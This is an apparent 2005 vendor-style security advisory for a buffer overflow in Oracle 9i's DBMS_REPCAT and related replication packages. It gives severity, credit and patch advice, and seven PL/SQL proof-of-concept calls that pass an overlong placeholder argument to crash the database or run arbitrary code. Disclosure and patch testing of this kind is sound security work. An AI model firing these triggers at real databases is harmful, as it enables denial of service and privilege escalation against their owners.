Buffer Overflow in DBMS REPCAT in Oracle 9i

Services
Oracle Audit / Hardening
Security Training
Consulting

Information
Oracle Security Blog
Published Alerts
Upcoming Alerts
Patch Information
Whitepaper
Presentations
Oracle Fact Sheets
Exploits
Tutorials
Videos
Scripts

News & Events
Events
News

Company
Contact
People
Partner
Impressum
Sitemap

Name	Buffer Overflow Oracle DBMS_REPCAT in Oracle 9i (up to 9.2.0.4)
Systems Affected	Oracle 9i
Severity	Medium Risk
Category	Buffer Overflow
Vendor URL	http://www.oracle.com/
Credit	Esteban Martinez Fayo (<argeniss>dot<com>)
Exploit	http://www.appsecinc.com
Date	10 May 2005 (V 1.00)

Details

Buffer Overflow in DBMS_REPCAT. This package has EXECUTE permission granted to SYSDBA or EXECUTE_CATALOG_ROLE. Members of these groups can exploit this vulnerability and crash the database or execute arbitrary code.

Example
BEGIN
DBMS_REPCAT.ADD_GROUPED_COLUMN ('longstring', 'longstring', 'cc','dd');
END;

BEGIN
DBMS_REPCAT.ADD_DELETE_RESOLUTION ('longstring', 'longstring', 0, '', '');
END;

BEGIN
DBMS_REPCAT.CANCEL_STATISTICS ('longstring', 'longstring');
END;

BEGIN
DBMS_REPCAT.DROP_MASTER_REPGROUP ('longstring');
END;

BEGIN
DBMS_REPCAT.ALTER_MVIEW_PROPAGATION ('longstring', '');
END;

BEGIN
DBMS_OFFLINE_OG.BEGIN_LOAD ('longstring', 'x');
END;

BEGIN
DBMS_OFFLINE_SNAPSHOT.END_LOAD ('longstring', 'x',’d’);
END;

Patch Information
Apply the latest Oracle Security patches (e.g. CPU October 2004 or at least alert 68)

Definition Exploit
An exploit is a common term in the computer security to refer to a piece of software that take advantage of a bug or vulnerability leading to a privilege escalation or d.o.s. on a computer system.
Computer security experts are using exploit code to test if a patch is working properly.